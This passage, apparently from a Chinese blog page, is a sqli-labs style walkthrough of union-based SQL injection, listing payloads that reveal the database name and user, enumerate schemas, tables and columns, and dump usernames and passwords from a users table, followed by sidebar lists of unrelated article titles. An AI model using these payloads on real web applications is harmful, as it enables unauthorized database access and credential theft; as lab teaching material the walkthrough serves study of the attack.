near '1' --+ ' LIMIT 0,1

?id=999' union select 1,database(),5 --+ 当前数据库
?id=999' union select 1,user(),5 --+ 当前用户名

爆数据库
?id=-1' union select 1,group_concat(schema_name),5 from information_schema.schemata --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(schema_name),3 from information_schema.schemata --+ LIMIT 0,1

爆 security 数据表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ LIMIT 0,1

爆users表的列
?id=-1' union select 1,group_concat(column_name),5 from information_schema.columns where table_name='users' --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ LIMIT 0,1

爆 users 的所有数据
?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(username),group_concat(password) from users --+ LIMIT 0,1

最新文章

1. 关于 bind 你可能需要了解的知识点以及使用场景
2. vim 配置
3. PIC32MZ tutorial -- 32-bit Timer
4. 构造 Codeforces Round #302 (Div. 2) B Sea and Islands
5. hadoop-2.7.0
6. php删除数组中相同的元素，只保留一个相同元素
7. maven 项目中使用 jstl标签
8. PHP 13: 类
9. Unity 3d中Shader是什么，可以吃吗？
10. mysql source 报错 Unknown command '\'' 解决办法
11. 新笔记tst
12. 2019中山大学程序设计竞赛-Monitor
13. 压测过程中出现ops断崖式下跌原因及排解
14. jenkins发送生成的html报告作为邮件附件，但无内容的问题分析
15. org.apache.poi 读取数字问题
16. 谈谈jQuery中的数据类型检测
17. move UVs of a texture
18. 2.9 C++使用默认参数的构造函数
19. javascript第一天知识点
20. (转)Maven学习总结(一)——Maven入门 安装使用

热门文章

1. Android BLE与终端通信(五)——Google API BLE4.0低功耗蓝牙文档解读之案例初探
2. Warning: $HADOOP_HOME is deprecated解决方法
3. 数据结构基础(2) --顺序查找 & 二分查找
4. 安全退出app，activoty栈管理
5. cat .git/config查看远端服务器信息（git的配置信息：远端服务器连接信息）
6. HibernateTemplate 查询原生sql及ljava.lang.object cannot be cast to
7. 100个Myeclipse6.5免费注册码
8. 为多态基类声明virtual析构函数
9. FPGrowth 实现
10. 分布式版本库——Windows下Git的环境部署以及在GitHub上开源自己的项目